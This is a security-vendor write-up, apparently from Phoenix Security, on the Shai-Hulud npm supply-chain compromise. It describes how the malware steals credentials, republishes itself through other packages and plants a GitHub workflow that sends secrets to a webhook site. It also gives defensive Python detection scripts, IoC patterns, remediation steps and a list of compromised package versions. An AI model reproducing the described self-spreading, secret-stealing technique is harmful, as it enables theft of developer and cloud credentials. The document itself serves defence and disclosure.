Shai-Hulud – npm’s Latest Supply Chain Breach: @ctrl/tinycolor and 526+ Packages, including CrowdStrike. What Actually Happened and How to Recover with ASPM?


TL;DR for engineering teams

  • Another npm maintainer account has been compromised in a supply chain attack, following the earlier QIX compromise.
  • The campaign, named Shai-Hulud, continues to target TinyColor and now CrowdStrike npm packages.
  • Another account has been compromised, following the same campaign pattern on npm.
  • The malware is identical to the tinycolor malware and includes a bundle.js script that:
    • Downloads and executes TruffleHog, a legitimate secret scanner
    • Searches host systems for tokens and cloud credentials
    • Validates discovered developer and CI credentials
    • Creates unauthorized GitHub Actions workflows within repositories
    • Exfiltrates sensitive data to a hardcoded webhook endpoint

  • Do not install @ctrl/tinycolor@4.1.1 or @4.1.2 (and avoid any dependency graph that resolves to them). The same campaign hit 40-74+ other packages (full list below).
  • The malware uses a self-propagating function (NpmModule.updatePackage) to grab maintainer packages, inject a Webpack-bundled bundle.js, repack, and republish, creating a blast radius across maintainers and dependents.
  • The payload pulls down TruffleHog, hunts for GITHUB_TOKEN, NPM_TOKEN, AWS/GCP/Azure credentials, validates tokens (npm whoami), hits GitHub APIs, writes a persistence GitHub Actions workflow that exfiltrates secrets to webhook[.]site, and can persist in CI even after the original host is clean. IoCs and exfil link below.
  • Initial alert attribution includes Daniel dos Santos Pereira and community triage; Socket and StepSecurity published detailed breakdowns and IoCs.
  • Rotate tokens, rip out the backdoor workflow, scan repos/org for Shai-Hulud branch and workflow, audit your clouds’ secret access, and lock down publish paths. Guidance and commands included.
  • Thanks to Daniel Pereira for the initial alert.

Update 19 September

  • New indicators of compromise: 23 new libraries affected, bringing the total to 526 libraries.
  • Script updated to include detection of the new indicators.

Update 18 September

  • New indicators of compromise: 27 new libraries affected, bringing the total to 504 libraries.
  • Script updated, plus integration with Phoenix Security.

Update 17 September

  • The number of libraries affected has increased from 40-74 to 477+.

What was compromised, and how it spread

This was not a one-off malicious post-install script. It is a small supply-chain engine:

  1. Trojanization pipeline
    The attacker’s code downloads a package tarball, modifies package.json, injects a local bundle.js, repacks, and republishes. That updatePackage function automates the spread across a maintainer’s other packages, weaponizing maintainer trust at scale.
  2. Execution vector
    The minified bundle.js (≈3.6MB) runs during install. It fingerprints the OS, pulls a matching TruffleHog binary, and starts secret harvesting. The code validates npm auth via /-/whoami, calls GitHub REST if a token is present, and probes cloud metadata endpoints used by build agents.
  3. Persistence and exfiltration
    If GitHub access is available, the script writes a workflow at .github/workflows/shai-hulud-workflow.yml. That workflow serializes secrets and posts them to a webhook[.]site endpoint. Once committed, secrets can leak from future CI runs even if the developer’s laptop is clean. The IoC hash and exfil URL are hardcoded.
  4. Scope and blast radius
    @ctrl/tinycolor counted ~2M weekly downloads and is just one node in the set. The same campaign hit multiple maintainers and org scopes, including CrowdStrike-scoped packages and a swath of @ctrl/* modules.

How to verify packages:

Launch our quick check tool:

python3 npm_compromise_detector.py '/path/to/your/project' --output security-audit.txt --check-cache --full-tree --show-locations
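As an added example (not the page's own npm_compromise_detector.py, and not Phoenix Security code), the following Python script shows the two checks the write-up calls for: matching a project's package-lock.json against compromised package@version pairs, and hunting a checked-out repository for the persistence indicators described in step 3 above (the shai-hulud-workflow.yml file, a branch named after the campaign, and any workflow that references the webhook[.]site exfiltration domain). The compromised-version set is a small subset of the page's list, and the lockfile and repository layout are constructed here so the script runs offline.

```python
"""Added example: lockfile and persistence-indicator check for the Shai-Hulud
campaign. Not the page's npm_compromise_detector.py; the compromised-version
subset and IoC names come from the write-up, the sample data is constructed."""
import json
import tempfile
from pathlib import Path

# Subset of the package@version pairs from the page's list (extend as needed).
COMPROMISED = {
    ("@ctrl/tinycolor", "4.1.1"),
    ("@ctrl/tinycolor", "4.1.2"),
    ("@crowdstrike/foundry-js", "0.19.1"),
    ("@crowdstrike/foundry-js", "0.19.2"),
    ("@nativescript-community/perms", "3.0.9"),
}
# Persistence IoCs named in the write-up: workflow path, branch name, exfil domain.
IOC_WORKFLOW = ".github/workflows/shai-hulud-workflow.yml"
IOC_BRANCH = "shai-hulud"
IOC_EXFIL_DOMAIN = "webhook.site"


def lockfile_hits(lock: dict) -> list:
    """Return sorted (name, version) pairs in a package-lock.json that are on
    the compromised list. Handles lockfileVersion 2/3 ('packages' map with keys
    like 'node_modules/a/node_modules/@scope/b') and v1 ('dependencies' tree)."""
    hits = set()
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # "" is the root project itself
        name = path.split("node_modules/")[-1]  # innermost package name
        if (name, meta.get("version")) in COMPROMISED:
            hits.add((name, meta["version"]))

    def walk(deps: dict) -> None:
        for name, meta in deps.items():
            if (name, meta.get("version")) in COMPROMISED:
                hits.add((name, meta["version"]))
            walk(meta.get("dependencies", {}))

    walk(lock.get("dependencies", {}))
    return sorted(hits)


def persistence_indicators(repo_root: str) -> list:
    """Return sorted indicators found under a checked-out repo: the known
    workflow path, any local branch named after the campaign, and any workflow
    (whatever its filename) that references the exfiltration domain."""
    root = Path(repo_root)
    found = set()
    if (root / IOC_WORKFLOW).is_file():
        found.add(f"workflow:{IOC_WORKFLOW}")
    workflows = root / ".github" / "workflows"
    if workflows.is_dir():
        for wf in list(workflows.glob("*.yml")) + list(workflows.glob("*.yaml")):
            if IOC_EXFIL_DOMAIN in wf.read_text(errors="ignore"):
                found.add(f"exfil-domain:{wf.relative_to(root).as_posix()}")
    heads = root / ".git" / "refs" / "heads"
    if heads.is_dir():
        for ref in heads.rglob("*"):
            if ref.is_file() and IOC_BRANCH in ref.name.lower():
                found.add(f"branch:{ref.name}")
    packed = root / ".git" / "packed-refs"  # branches may live here instead
    if packed.is_file():
        for line in packed.read_text().splitlines():
            if "refs/heads/" in line and IOC_BRANCH in line.lower():
                found.add("branch:" + line.split("refs/heads/")[-1].strip())
    return sorted(found)


# Constructed sample lockfile: one direct and one transitive compromised version.
SAMPLE_LOCK = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "dependencies": {"@ctrl/tinycolor": "^4.1.0"}},
        "node_modules/@ctrl/tinycolor": {"version": "4.1.2"},
        "node_modules/left-pad": {"version": "1.3.0"},
        "node_modules/some-lib/node_modules/@crowdstrike/foundry-js": {"version": "0.19.2"},
    },
}


def demo() -> dict:
    """Build a constructed repo layout in a temp dir and run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".github" / "workflows").mkdir(parents=True)
        (root / ".github" / "workflows" / "ci.yml").write_text("name: ci\n")  # benign
        (root / IOC_WORKFLOW).write_text(
            "name: placeholder\n# constructed fixture that mentions webhook.site\n")
        (root / ".git" / "refs" / "heads").mkdir(parents=True)
        (root / ".git" / "refs" / "heads" / "shai-hulud").write_text("0" * 40 + "\n")
        (root / ".git" / "refs" / "heads" / "main").write_text("0" * 40 + "\n")
        return {"lockfile": lockfile_hits(SAMPLE_LOCK),
                "persistence": persistence_indicators(tmp)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against a real checkout by replacing SAMPLE_LOCK with `json.load(open("package-lock.json"))` and passing the repository path to persistence_indicators; the domain check deliberately looks at every workflow file, not only the known filename, since a renamed backdoor workflow would otherwise slip past a path-only check.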

How to Check if You Are Affected by Shai-Hulud and verify in Phoenix Security

If you are a Phoenix Security client, verify your SBOM dependencies from third-party scanners or from the Phoenix Security scanner.

How to remediate / Prevention measures against Shai-Hulud npm campaigns and follow-up

The attack surface keeps expanding, and developers spread across an organization are the worst recipe for npm attacks like this. Below is a list of steps to consider to stop this attack from spreading.

Key suggestions

  • Pin dependencies. Avoid auto-update; pin dependencies.
  • Prevent direct access to or updates from npm or other package managers (see below).
  • Prevent unvetted updates by using a proxy.

To respond to and be prepared for Shai-Hulud and other npm package source attacks, follow the quick recommendations below. For detailed guidelines, check npm-shai-hulud-supply-chain-compromise-explained.

To defend against npm supply chain attacks and recover fast when incidents strike, adopt these practices:

  • Lock & Pin Dependencies – Use package-lock.json/pnpm-lock.yaml with npm ci (not npm install) and set save-exact=true in .npmrc.
  • Proxy & Sanitize – Route all installs through an internal package manager proxy (e.g., Nexus/Artifactory) that caches and sanitizes approved versions.
  • Restrict Registry Access – Temporarily block direct access to npm when an active campaign is underway, forcing developers to pull only vetted packages.
  • Detect & Monitor – Integrate SCA + malware scanning in CI/CD to catch compromised dependencies early, with reachability analysis to reduce noise.
  • Delay Adoption – Apply a “cooldown period” (e.g., 60 days for new packages) before trusting fresh releases.
  • Reduce Bloat – Eliminate unused or duplicate libraries, and leverage reachability analysis to prune non-critical dependencies.
  • Recovery Playbook: Responding to a Compromise
    • Isolate & Identify: Freeze deployments and check lockfiles against compromised versions.
    • Eradicate & Clean: Remove malicious packages, update to safe versions, purge caches, and commit fresh lockfiles.
    • Rotate All Credentials: Reset every token and secret used in CI/CD (GitHub, npm, cloud keys).
    • Audit for Persistence: Hunt for backdoors (e.g., malicious workflows) and remove them before resuming operations.
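The first, fifth and last bullets above (pin exact versions, apply a cooldown period, check lockfiles against compromised versions) can be turned into a pre-install gate. The following Python audit is an added example, not Phoenix Security code or the page's detector: it reads the dependency specs in package.json, resolves each spec the way a fresh `npm install` would (a simplified semver subset written here: exact, `~` and `^` specs, no prereleases), resolves it again with a 60-day cooldown, and flags specs that are unpinned, that would pull a version younger than the cooldown, or that land on a compromised version. The package.json and the registry `time` metadata (the shape the npm registry returns per package) are constructed sample data.

```python
"""Added example (not from the page or Phoenix Security): a pre-install audit
of package.json showing why exact pins and a cooldown period matter. The
semver handling is a simplified subset written here; the registry 'time' data
and package.json are constructed samples."""
from datetime import datetime, timedelta, timezone

# Small subset of the page's compromised versions, for illustration.
COMPROMISED = {("@ctrl/tinycolor", "4.1.1"), ("@ctrl/tinycolor", "4.1.2")}


def parse_ver(v: str) -> tuple:
    return tuple(int(p) for p in v.split("."))


def is_exact(spec: str) -> bool:
    """True for a bare 'x.y.z' spec, as save-exact=true in .npmrc produces."""
    return spec[:1].isdigit()


def satisfies(spec: str, version: str) -> bool:
    """Simplified npm range semantics for exact, '~x.y.z' and '^x.y.z' specs."""
    if is_exact(spec):
        return parse_ver(spec) == parse_ver(version)
    base, v = parse_ver(spec[1:]), parse_ver(version)
    if v < base:
        return False
    if spec[0] == "~":              # tilde: same major.minor
        return v[:2] == base[:2]
    if spec[0] == "^":              # caret: leftmost non-zero component is fixed
        if base[0] > 0:
            return v[0] == base[0]
        if base[1] > 0:
            return v[:2] == base[:2]
        return v == base
    raise ValueError(f"unsupported spec: {spec}")


def resolve(spec: str, published: dict, now=None, cooldown_days: int = 0):
    """Pick the highest version matching spec, as npm would. With a cooldown,
    ignore anything published less than cooldown_days before now."""
    cutoff = now - timedelta(days=cooldown_days) if now else None
    candidates = [v for v, t in published.items()
                  if satisfies(spec, v) and (cutoff is None or t <= cutoff)]
    return max(candidates, key=parse_ver) if candidates else None


def audit_dependencies(pkg: dict, registry_time: dict, now, cooldown_days=60,
                       compromised=COMPROMISED) -> dict:
    """For each dependency: what a fresh install would resolve, what a
    cooldown-aware resolver would pick instead, and the flags raised."""
    report = {}
    for name, spec in pkg.get("dependencies", {}).items():
        published = {v: datetime.fromisoformat(t.replace("Z", "+00:00"))
                     for v, t in registry_time[name].items()
                     if v not in ("created", "modified")}
        resolved = resolve(spec, published)
        flags = []
        if not is_exact(spec):
            flags.append("unpinned")
        if resolved and now - published[resolved] < timedelta(days=cooldown_days):
            flags.append("within-cooldown")
        if (name, resolved) in compromised:
            flags.append("compromised")
        report[name] = {
            "spec": spec,
            "resolves_to": resolved,
            "resolves_to_with_cooldown": resolve(spec, published, now, cooldown_days),
            "flags": flags,
        }
    return report


# Constructed sample data: a caret range and an exactly pinned dependency, plus
# registry 'time' metadata. Publish dates are invented for the illustration.
SAMPLE_PACKAGE_JSON = {"dependencies": {"@ctrl/tinycolor": "^4.1.0", "left-pad": "1.3.0"}}
SAMPLE_REGISTRY_TIME = {
    "@ctrl/tinycolor": {
        "created": "2019-01-01T00:00:00Z",
        "4.1.0": "2025-06-01T00:00:00Z",
        "4.1.1": "2025-09-15T00:00:00Z",   # compromised publish
        "4.1.2": "2025-09-15T06:00:00Z",   # compromised publish
    },
    "left-pad": {"1.3.0": "2018-04-01T00:00:00Z"},
}
NOW = datetime(2025, 9, 19, tzinfo=timezone.utc)

if __name__ == "__main__":
    for name, row in audit_dependencies(SAMPLE_PACKAGE_JSON, SAMPLE_REGISTRY_TIME, NOW).items():
        print(name, row)
```

With the sample data, `^4.1.0` resolves to the compromised 4.1.2 on a fresh install but to 4.1.0 once the 60-day cooldown is applied, while the exactly pinned left-pad is untouched either way; in a real pipeline the `time` map comes from `GET https://registry.npmjs.org/<package>` and the gate runs before `npm ci`.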

Packages confirmed in this campaign


Do not install @ctrl/tinycolor@4.1.1+ (or any resolver path that selects those versions) until you’ve verified provenance. The maintainer account scttcper is the publisher for many of the affected @ctrl/* and Angular packages; treat any recent publishes with extreme caution while provenance is established.

Refer to the full analysis of Shai-Hulud for details on the waves.

| Full Path | Root | Library | Version | Status |
| --- | --- | --- | --- | --- |
| @ahmedhfarag/ngx-perfect-scrollbar@20.0.20 | @ahmedhfarag | ngx-perfect-scrollbar | 20.0.20 | PREVIOUS REPORT |
| @ahmedhfarag/ngx-virtual-scroller@4.0.4 | @ahmedhfarag | ngx-virtual-scroller | 4.0.4 | PREVIOUS REPORT |
| @art-ws/common@2.0.28 | @art-ws | common | 2.0.28 | PREVIOUS REPORT |
| @art-ws/config-eslint@2.0.4 | @art-ws | config-eslint | 2.0.4 | PREVIOUS REPORT |
| @art-ws/config-eslint@2.0.5 | @art-ws | config-eslint | 2.0.5 | PREVIOUS REPORT |
| @art-ws/config-ts@2.0.7 | @art-ws | config-ts | 2.0.7 | PREVIOUS REPORT |
| @art-ws/config-ts@2.0.8 | @art-ws | config-ts | 2.0.8 | PREVIOUS REPORT |
| @art-ws/db-context@2.0.24 | @art-ws | db-context | 2.0.24 | PREVIOUS REPORT |
| @art-ws/di-node@2.0.13 | @art-ws | di-node | 2.0.13 | PREVIOUS REPORT |
| @art-ws/di@2.0.28 | @art-ws | di | 2.0.28 | PREVIOUS REPORT |
| @art-ws/di@2.0.32 | @art-ws | di | 2.0.32 | PREVIOUS REPORT |
| @art-ws/eslint@1.0.5 | @art-ws | eslint | 1.0.5 | PREVIOUS REPORT |
| @art-ws/eslint@1.0.6 | @art-ws | eslint | 1.0.6 | PREVIOUS REPORT |
| @art-ws/fastify-http-server@2.0.24 | @art-ws | fastify-http-server | 2.0.24 | PREVIOUS REPORT |
| @art-ws/fastify-http-server@2.0.27 | @art-ws | fastify-http-server | 2.0.27 | PREVIOUS REPORT |
| @art-ws/http-server@2.0.21 | @art-ws | http-server | 2.0.21 | PREVIOUS REPORT |
| @art-ws/http-server@2.0.25 | @art-ws | http-server | 2.0.25 | PREVIOUS REPORT |
| @art-ws/openapi@0.1.12 | @art-ws | openapi | 0.1.12 | PREVIOUS REPORT |
| @art-ws/openapi@0.1.9 | @art-ws | openapi | 0.1.9 | PREVIOUS REPORT |
| @art-ws/package-base@1.0.5 | @art-ws | package-base | 1.0.5 | PREVIOUS REPORT |
| @art-ws/package-base@1.0.6 | @art-ws | package-base | 1.0.6 | PREVIOUS REPORT |
| @art-ws/prettier@1.0.5 | @art-ws | prettier | 1.0.5 | PREVIOUS REPORT |
| @art-ws/prettier@1.0.6 | @art-ws | prettier | 1.0.6 | PREVIOUS REPORT |
| @art-ws/slf@2.0.15 | @art-ws | slf | 2.0.15 | PREVIOUS REPORT |
| @art-ws/slf@2.0.22 | @art-ws | slf | 2.0.22 | PREVIOUS REPORT |
| @art-ws/ssl-info@1.0.10 | @art-ws | ssl-info | 1.0.10 | PREVIOUS REPORT |
| @art-ws/ssl-info@1.0.9 | @art-ws | ssl-info | 1.0.9 | PREVIOUS REPORT |
| @art-ws/web-app@1.0.3 | @art-ws | web-app | 1.0.3 | PREVIOUS REPORT |
| @art-ws/web-app@1.0.4 | @art-ws | web-app | 1.0.4 | PREVIOUS REPORT |
| @crowdstrike/commitlint@8.1.1 | @crowdstrike | commitlint | 8.1.1 | PREVIOUS REPORT |
| @crowdstrike/commitlint@8.1.2 | @crowdstrike | commitlint | 8.1.2 | PREVIOUS REPORT |
| @crowdstrike/falcon-shoelace@0.4.1 | @crowdstrike | falcon-shoelace | 0.4.1 | PREVIOUS REPORT |
| @crowdstrike/falcon-shoelace@0.4.2 | @crowdstrike | falcon-shoelace | 0.4.2 | PREVIOUS REPORT |
| @crowdstrike/foundry-js@0.19.1 | @crowdstrike | foundry-js | 0.19.1 | PREVIOUS REPORT |
| @crowdstrike/foundry-js@0.19.2 | @crowdstrike | foundry-js | 0.19.2 | PREVIOUS REPORT |
| @crowdstrike/glide-core@0.34.2 | @crowdstrike | glide-core | 0.34.2 | PREVIOUS REPORT |
| @crowdstrike/glide-core@0.34.3 | @crowdstrike | glide-core | 0.34.3 | PREVIOUS REPORT |
| @crowdstrike/logscale-dashboard@1.205.1 | @crowdstrike | logscale-dashboard | 1.205.1 | PREVIOUS REPORT |
| @crowdstrike/logscale-dashboard@1.205.2 | @crowdstrike | logscale-dashboard | 1.205.2 | PREVIOUS REPORT |
| @crowdstrike/logscale-file-editor@1.205.1 | @crowdstrike | logscale-file-editor | 1.205.1 | PREVIOUS REPORT |
| @crowdstrike/logscale-file-editor@1.205.2 | @crowdstrike | logscale-file-editor | 1.205.2 | PREVIOUS REPORT |
| @crowdstrike/logscale-parser-edit@1.205.1 | @crowdstrike | logscale-parser-edit | 1.205.1 | PREVIOUS REPORT |
| @crowdstrike/logscale-parser-edit@1.205.2 | @crowdstrike | logscale-parser-edit | 1.205.2 | PREVIOUS REPORT |
| @crowdstrike/logscale-search@1.205.1 | @crowdstrike | logscale-search | 1.205.1 | PREVIOUS REPORT |
| @crowdstrike/logscale-search@1.205.2 | @crowdstrike | logscale-search | 1.205.2 | PREVIOUS REPORT |
| @crowdstrike/tailwind-toucan-base@5.0.1 | @crowdstrike | tailwind-toucan-base | 5.0.1 | PREVIOUS REPORT |
| @crowdstrike/tailwind-toucan-base@5.0.2 | @crowdstrike | tailwind-toucan-base | 5.0.2 | PREVIOUS REPORT |
| @ctrl/deluge@7.2.1 | @ctrl | deluge | 7.2.1 | PREVIOUS REPORT |
| @ctrl/deluge@7.2.2 | @ctrl | deluge | 7.2.2 | PREVIOUS REPORT |
| @ctrl/golang-template@1.4.2 | @ctrl | golang-template | 1.4.2 | PREVIOUS REPORT |
| @ctrl/golang-template@1.4.3 | @ctrl | golang-template | 1.4.3 | PREVIOUS REPORT |
| @ctrl/magnet-link@4.0.3 | @ctrl | magnet-link | 4.0.3 | PREVIOUS REPORT |
| @ctrl/magnet-link@4.0.4 | @ctrl | magnet-link | 4.0.4 | PREVIOUS REPORT |
| @ctrl/ngx-codemirror@7.0.1 | @ctrl | ngx-codemirror | 7.0.1 | PREVIOUS REPORT |
| @ctrl/ngx-codemirror@7.0.2 | @ctrl | ngx-codemirror | 7.0.2 | PREVIOUS REPORT |
| @ctrl/ngx-csv@6.0.1 | @ctrl | ngx-csv | 6.0.1 | PREVIOUS REPORT |
| @ctrl/ngx-csv@6.0.2 | @ctrl | ngx-csv | 6.0.2 | PREVIOUS REPORT |
| @ctrl/ngx-emoji-mart@9.2.1 | @ctrl | ngx-emoji-mart | 9.2.1 | PREVIOUS REPORT |
| @ctrl/ngx-emoji-mart@9.2.2 | @ctrl | ngx-emoji-mart | 9.2.2 | PREVIOUS REPORT |
| @ctrl/ngx-rightclick@4.0.1 | @ctrl | ngx-rightclick | 4.0.1 | PREVIOUS REPORT |
| @ctrl/ngx-rightclick@4.0.2 | @ctrl | ngx-rightclick | 4.0.2 | PREVIOUS REPORT |
| @ctrl/qbittorrent@9.7.1 | @ctrl | qbittorrent | 9.7.1 | PREVIOUS REPORT |
| @ctrl/qbittorrent@9.7.2 | @ctrl | qbittorrent | 9.7.2 | PREVIOUS REPORT |
| @ctrl/react-adsense@2.0.1 | @ctrl | react-adsense | 2.0.1 | PREVIOUS REPORT |
| @ctrl/react-adsense@2.0.2 | @ctrl | react-adsense | 2.0.2 | PREVIOUS REPORT |
| @ctrl/shared-torrent@6.3.1 | @ctrl | shared-torrent | 6.3.1 | PREVIOUS REPORT |
| @ctrl/shared-torrent@6.3.2 | @ctrl | shared-torrent | 6.3.2 | PREVIOUS REPORT |
| @ctrl/tinycolor@4.1.1 | @ctrl | tinycolor | 4.1.1 | PREVIOUS REPORT |
| @ctrl/tinycolor@4.1.2 | @ctrl | tinycolor | 4.1.2 | PREVIOUS REPORT |
| @ctrl/torrent-file@4.1.1 | @ctrl | torrent-file | 4.1.1 | PREVIOUS REPORT |
| @ctrl/torrent-file@4.1.2 | @ctrl | torrent-file | 4.1.2 | PREVIOUS REPORT |
| @ctrl/transmission@7.3.1 | @ctrl | transmission | 7.3.1 | PREVIOUS REPORT |
| @ctrl/ts-base32@4.0.1 | @ctrl | ts-base32 | 4.0.1 | PREVIOUS REPORT |
| @ctrl/ts-base32@4.0.2 | @ctrl | ts-base32 | 4.0.2 | PREVIOUS REPORT |
| @hestjs/core@0.2.1 | @hestjs | core | 0.2.1 | PREVIOUS REPORT |
| @hestjs/cqrs@0.1.6 | @hestjs | cqrs | 0.1.6 | PREVIOUS REPORT |
| @hestjs/demo@0.1.2 | @hestjs | demo | 0.1.2 | PREVIOUS REPORT |
| @hestjs/eslint-config@0.1.2 | @hestjs | eslint-config | 0.1.2 | PREVIOUS REPORT |
| @hestjs/logger@0.1.6 | @hestjs | logger | 0.1.6 | PREVIOUS REPORT |
| @hestjs/scalar@0.1.7 | @hestjs | scalar | 0.1.7 | PREVIOUS REPORT |
| @hestjs/validation@0.1.6 | @hestjs | validation | 0.1.6 | PREVIOUS REPORT |
| @nativescript-community/arraybuffers@1.1.6 | @nativescript-community | arraybuffers | 1.1.6 | PREVIOUS REPORT |
| @nativescript-community/arraybuffers@1.1.7 | @nativescript-community | arraybuffers | 1.1.7 | PREVIOUS REPORT |
| @nativescript-community/arraybuffers@1.1.8 | @nativescript-community | arraybuffers | 1.1.8 | PREVIOUS REPORT |
| @nativescript-community/gesturehandler@2.0.35 | @nativescript-community | gesturehandler | 2.0.35 | PREVIOUS REPORT |
| @nativescript-community/perms@3.0.5 | @nativescript-community | perms | 3.0.5 | PREVIOUS REPORT |
| @nativescript-community/perms@3.0.6 | @nativescript-community | perms | 3.0.6 | PREVIOUS REPORT |
| @nativescript-community/perms@3.0.7 | @nativescript-community | perms | 3.0.7 | PREVIOUS REPORT |
| @nativescript-community/perms@3.0.8 | @nativescript-community | perms | 3.0.8 | PREVIOUS REPORT |
| @nativescript-community/perms@3.0.9 | @nativescript-community | perms | 3.0.9 | NEW FINDING |
| @nativescript-community/sentry@4.6.43 | @nativescript-community | sentry | 4.6.43 | PREVIOUS REPORT |
| @nativescript-community/sqlite@3.5.2 | @nativescript-community | sqlite | 3.5.2 | PREVIOUS REPORT |
| @nativescript-community/sqlite@3.5.3 | @nativescript-community | sqlite | 3.5.3 | PREVIOUS REPORT |
| @nativescript-community/sqlite@3.5.4 | @nativescript-community | sqlite | 3.5.4 | PREVIOUS REPORT |
| @nativescript-community/sqlite@3.5.5 | @nativescript-community | sqlite | 3.5.5 | PREVIOUS REPORT |
| @nativescript-community/text@1.6.10 | @nativescript-community | text | 1.6.10 | PREVIOUS REPORT |
| @nativescript-community/text@1.6.11 | @nativescript-community | text | 1.6.11 | PREVIOUS REPORT |
| @nativescript-community/text@1.6.12 | @nativescript-community | text | 1.6.12 | PREVIOUS REPORT |
| @nativescript-community/text@1.6.13 | @nativescript-community | text | 1.6.13 | PREVIOUS REPORT |
| @nativescript-community/text@1.6.9 | @nativescript-community | text | 1.6.9 | PREVIOUS REPORT |
| @nativescript-community/typeorm@0.2.30 | @nativescript-community | typeorm | 0.2.30 | PREVIOUS REPORT |
| @nativescript-community/typeorm@0.2.31 | @nativescript-community | typeorm | 0.2.31 | PREVIOUS REPORT |
| @nativescript-community/typeorm@0.2.32 | @nativescript-community | typeorm | 0.2.32 | PREVIOUS REPORT |
| @nativescript-community/typeorm@0.2.33 | @nativescript-community | typeorm | 0.2.33 | PREVIOUS REPORT |
| @nativescript-community/ui-collectionview@6.0.6 | @nativescript-community | ui-collectionview | 6.0.6 | PREVIOUS REPORT |
| @nativescript-community/ui-document-picker@1.1.27 | @nativescript-community | ui-document-picker | 1.1.27 | PREVIOUS REPORT |
| @nativescript-community/ui-document-picker@1.1.28 | @nativescript-community | ui-document-picker | 1.1.28 | PREVIOUS REPORT |
| @nativescript-community/ui-drawer@0.1.30 | @nativescript-community | ui-drawer | 0.1.30 | PREVIOUS REPORT |
| @nativescript-community/ui-image@4.5.6 | @nativescript-community | ui-image | 4.5.6 | PREVIOUS REPORT |
| @nativescript-community/ui-label@1.3.35 | @nativescript-community | ui-label | 1.3.35 | PREVIOUS REPORT |
| @nativescript-community/ui-label@1.3.36 | @nativescript-community | ui-label | 1.3.36 | PREVIOUS REPORT |
| @nativescript-community/ui-label@1.3.37 | @nativescript-community | ui-label | 1.3.37 | PREVIOUS REPORT |
| @nativescript-community/ui-material-bottom-navigation@7.2.72 | @nativescript-community | ui-material-bottom-navigation | 7.2.72 | PREVIOUS REPORT |
| @nativescript-community/ui-material-bottom-navigation@7.2.73 | @nativescript-community | ui-material-bottom-navigation | 7.2.73 | PREVIOUS REPORT |
| @nativescript-community/ui-material-bottom-navigation@7.2.74 | @nativescript-community | ui-material-bottom-navigation | 7.2.74 | PREVIOUS REPORT |
| @nativescript-community/ui-material-bottom-navigation@7.2.75 | @nativescript-community | ui-material-bottom-navigation | 7.2.75 | PREVIOUS REPORT |
| @nativescript-community/ui-material-bottomsheet@7.2.72 | @nativescript-community | ui-material-bottomsheet | 7.2.72 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core-tabs@7.2.72 | @nativescript-community | ui-material-core-tabs | 7.2.72 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core-tabs@7.2.73 | @nativescript-community | ui-material-core-tabs | 7.2.73 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core-tabs@7.2.74 | @nativescript-community | ui-material-core-tabs | 7.2.74 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core-tabs@7.2.75 | @nativescript-community | ui-material-core-tabs | 7.2.75 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core-tabs@7.2.76 | @nativescript-community | ui-material-core-tabs | 7.2.76 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core@7.2.72 | @nativescript-community | ui-material-core | 7.2.72 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core@7.2.73 | @nativescript-community | ui-material-core | 7.2.73 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core@7.2.74 | @nativescript-community | ui-material-core | 7.2.74 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core@7.2.75 | @nativescript-community | ui-material-core | 7.2.75 | PREVIOUS REPORT |
| @nativescript-community/ui-material-core@7.2.76 | @nativescript-community | ui-material-core | 7.2.76 | PREVIOUS REPORT |
| @nativescript-community/ui-material-ripple@7.2.72 | @nativescript-community | ui-material-ripple | 7.2.72 | PREVIOUS REPORT |
| @nativescript-community/ui-material-ripple@7.2.73 | @nativescript-community | ui-material-ripple | 7.2.73 | PREVIOUS REPORT |
| @nativescript-community/ui-material-ripple@7.2.74 | @nativescript-community | ui-material-ripple | 7.2.74 | PREVIOUS REPORT |
| @nativescript-community/ui-material-ripple@7.2.75 | @nativescript-community | ui-material-ripple | 7.2.75 | PREVIOUS REPORT |
| @nativescript-community/ui-material-tabs@7.2.72 | @nativescript-community | ui-material-tabs | 7.2.72 | PREVIOUS REPORT |
| @nativescript-community/ui-material-tabs@7.2.73 | @nativescript-community | ui-material-tabs | 7.2.73 | PREVIOUS REPORT |
| @nativescript-community/ui-material-tabs@7.2.74 | @nativescript-community | ui-material-tabs | 7.2.74 | PREVIOUS REPORT |
| @nativescript-community/ui-material-tabs@7.2.75 | @nativescript-community | ui-material-tabs | 7.2.75 | PREVIOUS REPORT |
| @nativescript-community/ui-pager@14.1.36 | @nativescript-community | ui-pager | 14.1.36 | PREVIOUS REPORT |
| @nativescript-community/ui-pager@14.1.37 | @nativescript-community | ui-pager | 14.1.37 | PREVIOUS REPORT |
| @nativescript-community/ui-pager@14.1.38 | @nativescript-community | ui-pager | 14.1.38 | PREVIOUS REPORT |
| @nativescript-community/ui-pulltorefresh@2.5.4 | @nativescript-community | ui-pulltorefresh | 2.5.4 | PREVIOUS REPORT |
| @nativescript-community/ui-pulltorefresh@2.5.5 | @nativescript-community | ui-pulltorefresh | 2.5.5 | PREVIOUS REPORT |
| @nativescript-community/ui-pulltorefresh@2.5.6 | @nativescript-community | ui-pulltorefresh | 2.5.6 | PREVIOUS REPORT |
| @nativescript-community/ui-pulltorefresh@2.5.7 | @nativescript-community | ui-pulltorefresh | 2.5.7 | PREVIOUS REPORT |
| @nexe/config-manager@0.1.1 | @nexe | config-manager | 0.1.1 | PREVIOUS REPORT |
| @nexe/eslint-config@0.1.1 | @nexe | eslint-config | 0.1.1 | PREVIOUS REPORT |
| @nexe/logger@0.1.3 | @nexe | logger | 0.1.3 | PREVIOUS REPORT |
| @nstudio/angular@20.0.4 | @nstudio | angular | 20.0.4 | PREVIOUS REPORT |
| @nstudio/angular@20.0.5 | @nstudio | angular | 20.0.5 | PREVIOUS REPORT |
| @nstudio/angular@20.0.6 | @nstudio | angular | 20.0.6 | PREVIOUS REPORT |
| @nstudio/focus@20.0.4 | @nstudio | focus | 20.0.4 | PREVIOUS REPORT |
| @nstudio/focus@20.0.5 | @nstudio | focus | 20.0.5 | PREVIOUS REPORT |
